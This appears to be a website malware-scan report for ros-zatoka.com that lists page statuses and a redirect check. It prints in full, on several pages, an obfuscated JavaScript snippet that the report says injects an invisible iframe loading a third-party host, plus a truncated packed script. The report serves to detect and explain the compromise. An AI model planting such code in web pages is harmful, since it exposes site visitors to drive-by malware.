Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ros-zatoka.com
Result: The website is marked by Google as suspicious — visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ros-zatoka.com/ | 200 OK Content-Length: 19652 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));
What the snippet does: the hex string in z decodes to the method names split, slice, length, fromCharCode, substr and charCodeAt, which ___() uses to decode its argument before passing it to document.write. The decoded markup is an <iframe> with frameborder 0 and a width and height of 0 that loads from a third-party host, i.e. an invisible iframe injection. The same snippet is reported for every other page marked malicious below, including the 404 error page.
Decoded script (as shown by the scanner; it is still wrapped in an eval(function(p,a,c,k,e,d){…}) packer and is cut off mid-expression in this report):
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e,
Antivirus reports:
| ||
http://www.ros-zatoka.com/engine/classes/js/jquery.js | 200 OK Content-Length: 91556 Content-Type: application/x-javascript | clean |
http://www.ros-zatoka.com/engine/classes/js/jqueryui.js | 200 OK Content-Length: 65247 Content-Type: application/x-javascript | clean |
http://www.ros-zatoka.com/engine/classes/js/dle_js.js | 200 OK Content-Length: 19627 Content-Type: application/x-javascript | clean |
http://www.ros-zatoka.com/kontakty/ | 200 OK Content-Length: 20501 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://www.ros-zatoka.com/o-nas/ | 200 OK Content-Length: 20126 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://www.ros-zatoka.com/nomera/ | 200 OK Content-Length: 6750 Content-Type: text/html | suspicious |
Suspicious code found | ||
http://www.ros-zatoka.com/nomera-i-kategorii/ | 200 OK Content-Length: 5244 Content-Type: text/html | suspicious |
Suspicious code found | ||
http://www.ros-zatoka.com/nomera-ii-kategorii/ | 200 OK Content-Length: 5130 Content-Type: text/html | suspicious |
Suspicious code found | ||
http://www.ros-zatoka.com/bronirovanie/ | 200 OK Content-Length: 5164 Content-Type: text/html | suspicious |
Suspicious code found | ||
http://www.ros-zatoka.com/uslugi/ | 200 OK Content-Length: 20281 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://www.ros-zatoka.com/foto-galereja/ | 200 OK Content-Length: 36354 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://www.ros-zatoka.com/engine/classes/highslide/highslide.js | 200 OK Content-Length: 32986 Content-Type: application/x-javascript | clean |
http://www.ros-zatoka.com/test404page.js | 404 Not Found Content-Length: 19028 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ros-zatoka.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ros-zatoka.com
Referer: http://www.google.com/search?q=ros-zatoka.com
Result:
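The result matches the first query; no suspicious redirects were found. Only the Referer header differs between the two requests, so redirects that key on the User-Agent, cookies or the visitor's IP address are not covered by this check.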